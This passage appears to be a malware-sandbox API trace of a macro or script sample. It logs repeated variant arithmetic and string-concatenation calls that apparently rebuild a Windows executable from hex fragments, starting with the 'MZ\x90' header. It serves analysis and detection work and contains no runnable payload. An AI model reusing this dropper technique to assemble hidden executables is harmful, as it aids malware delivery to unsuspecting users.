returned 0x0 [0203.137] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.137] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.137] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.137] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.137] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.138] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.138] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.138] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.138] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.138] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.138] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.138] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.138] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.138] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.138] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.139] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.139] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.139] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.139] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.139] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.139] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.139] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.139] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.140] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.140] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.140] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.140] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.140] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.140] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.140] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.140] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.140] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.140] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.140] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.140] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.140] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.140] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.140] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.140] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.140] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.141] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.141] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.141] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.141] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.141] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.141] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.141] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.141] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.141] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.142] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.142] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.142] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.142] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.142] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.142] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.142] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.142] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.142] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.142] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.142] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.142] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.142] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.142] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.142] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.143] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.143] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.143] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.143] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.143] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.143] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.143] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.143] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.143] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.143] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.144] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.144] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.144] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.144] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.144] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.144] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.144] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.144] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.144] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.145] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.145] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.145] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.145] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.145] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.145] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.145] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.145] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.145] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.145] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.145] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.145] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.145] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.145] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.145] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.146] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.146] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.146] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.146] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.146] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.146] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.146] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.146] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.146] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.147] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.147] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.147] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.147] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.147] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.147] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.147] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.147] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.147] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.147] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.147] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.147] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.147] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.147] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.147] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.148] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.148] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.148] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.148] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.148] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.148] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.148] VarBstrCat (in: bstrLeft="0", bstrRight="80100", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.148] VarBstrCat (in: bstrLeft="&H", bstrRight="08", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.148] VarBstrCat (in: bstrLeft="&H", bstrRight="01", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.148] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.148] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.149] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="\x08\x01", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.149] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.149] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.149] VarSub (in: pvarLeft=0xa025ed8, 